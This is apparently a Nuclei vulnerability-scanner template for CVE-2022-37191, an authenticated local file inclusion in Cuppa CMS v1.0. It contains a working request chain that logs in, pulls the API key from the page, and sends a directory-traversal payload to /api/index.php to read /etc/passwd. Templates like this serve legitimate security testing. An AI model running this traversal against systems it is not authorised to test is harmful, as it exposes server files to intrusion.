nuclei-templates/http/cves/2022/CVE-2022-37191.yaml

78 lines
2.3 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-37191
info:
name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
author: theamanrawat
severity: medium
description: |
The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
2023-04-21 08:56:01 +00:00
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-37191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2022-37191
cwe-id: CWE-829
2023-10-14 11:27:55 +00:00
epss-score: 0.36609
epss-percentile: 0.96762
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: cuppacms
product: cuppacms
2023-04-21 08:56:01 +00:00
tags: cve,cve2022,lfi,cuppa,authenticated
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Ftable_manager%2Fview%2Fcu_api_keys
- |
POST /api/index.php HTTP/1.1
Host: {{Hostname}}
key: {{apikey}}
Content-Type: application/x-www-form-urlencoded
function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/
cookie-reuse: true
2023-07-11 19:49:27 +00:00
2023-04-21 08:56:01 +00:00
matchers-condition: and
matchers:
- type: word
part: header_3
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: regex
part: body_3
regex:
- "root:[x*]:0:0"
2023-04-21 08:56:01 +00:00
- type: status
status:
- 200
extractors:
- type: regex
name: apikey
group: 1
regex:
- "<td class='td_key'>(.*?)</td>"
2023-07-11 19:49:27 +00:00
internal: true
# digest: 4b0a00483046022100ba8e627952b937a9c1c8a6838b636a09c329f5930ed9cd699b683c4471b7b1ae022100936b67cefe191a7149b50c5fba9d095d0b3cd46318155649b475afd8ecfa4d6e:922c64590222798bb761d5b6d8e72950